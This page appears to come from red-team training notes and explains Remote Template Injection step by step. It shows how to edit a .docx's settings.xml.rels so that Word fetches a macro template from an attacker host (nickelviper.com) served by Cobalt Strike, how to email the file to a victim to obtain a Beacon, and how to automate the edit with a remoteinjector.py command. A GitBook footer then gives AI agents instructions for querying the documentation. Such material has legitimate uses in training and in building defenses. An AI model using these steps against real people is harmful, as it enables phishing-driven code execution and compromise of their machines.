> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/initial-compromise/remote-template-injection.md).

# Remote Template Injection

Microsoft Word has the option of creating new documents from a template. Office has some templates pre-installed, you can make custom templates, and even download new ones. Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution.

Open Word on the Attacker Desktop, create a new blank document and insert your desired macro. Save this to `C:\Payloads` as a Word 97-2003 Template (\*.dot) file. This is now our "malicious remote template". Use Cobalt Strike to host this file at *<http://nickelviper.com/template.dot>*.

Next, create a new document from the blank template located in `C:\Users\Attacker\Documents\Custom Office Templates`. Add any content you want, then save it to `C:\Payloads` as a new .docx. Browse to the directory in explorer, right-click and select *7-Zip > Open archive*. Navigate to \_word > \_rels, r\_ight-click on `settings.xml.rels` and select *Edit*.

This is just a small XML file. Scroll right until you see the *Target* entry.

```
Target="file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"
```

\\

It's currently pointing to the template on our local disk from which the document was created. Simply modify this so it points to the template URL instead.

```
Target="http://nickelviper.com/template.dot"
```

\\

Save those changes and email the document to Bob. Once the file is opened, you'll see a warning about macros again but allowing them to run will execute the macro in the hosted template, given us a Beacon.

\\

***

\\

[John Woodman](https://twitter.com/JohnWoodman15) created a [python tool](https://github.com/JohnWoodman/remoteinjector) that can automate this process so that we don't have to modify the XML manually.

```
ubuntu@DESKTOP-3BSK7NO ~> python3 remoteinjector.py -w http://nickelviper.com/template.dot /mnt/c/Payloads/document.docx
URL Injected and saved to /mnt/c/Payloads/document_new.docx
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://yamortsa.gitbook.io/rto/initial-compromise/remote-template-injection.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
